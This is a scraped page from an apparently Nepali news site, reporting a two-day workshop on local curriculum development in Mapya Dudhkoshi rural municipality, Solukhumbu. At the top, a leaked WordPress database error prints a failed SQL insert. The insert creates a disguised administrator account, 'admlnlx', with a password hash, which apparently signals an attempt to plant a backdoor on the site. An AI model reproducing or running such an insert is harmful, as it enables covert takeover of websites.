WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BJr0VQClIAmiSiC37kynAh3lZwqKyC0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 12:48:34', '', 'admlnlx', 'admlnlx')

माप्यदुधकोशीमा स्थानीय पाठ्यक्रम निर्माण सम्बन्धि दुई दिने कार्यशाला गोष्ठी सुरु – Gaule Khabar

माप्यदुधकोशीमा स्थानीय पाठ्यक्रम निर्माण सम्बन्धि दुई दिने कार्यशाला गोष्ठी सुरु

माप्यदुधकोशीमा स्थानीय पाठ्यक्रम निर्माण सम्बन्धि दुई दिने कार्यशाला गोष्ठी सुरु

सोलुखुम्बु । सोलुखुम्बु जिल्लाको माप्यदुधकोशी गाउँपालिकामा स्थानीय पाठ्यक्रम निर्माण सम्बन्धि अभिमूखी कार्यशाला गोष्ठी सुरु भएको छ । स्थानीय पाठ्यक्रम निर्माण समितीका संयोजक तथा माप्य दुधकोशी गाउँपालिका वडा नम्बर ३ का वडाध्यक्ष नारायणकाजी कार्कीको अध्यक्षतामा सुरु भएको गोष्ठी दुई दिन सम्म सन्चालन हुने छ ।

 

गाउँपालिका अध्यक्ष बुद्धिकिरण राईको प्रमुख अतिथिमा जारी अभिमूखी कार्यशाला गोष्ठिमा जिल्ला शिक्षा समन्वय इकाई सोलुखुम्बुका प्रमुख खगेन्द्र श्रेष्ठ, जिल्ला आयोजना कार्यन्वयन इकाई शिक्षा सोलुखुम्बुका प्रमुख तारानाथ निरौला, स्थानीय पाठ्यक्रम निर्माण समितीका सदस्यहरु, माप्य दुधकोशी गाउँपालिकमा रहेका विद्यालयका प्रधानआध्यापकहरु लगाएतको सहभागीता रहेको गाउँपालिका उपाध्यक्ष जुनिती मगरले जानकारी दिए ।

माप्य दुधकोशी गाउँपालिकाको सभाहलमा सन्चालन भएको अभिमूखी कार्यशाला गोष्ठी कार्यक्रमको सहजिकरण बिषय बिज्ञ पाठ्यक्रम अधिकृत खिलानाथ श्रेष्ठले गर्नुभएको छ ।

 

 

 

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका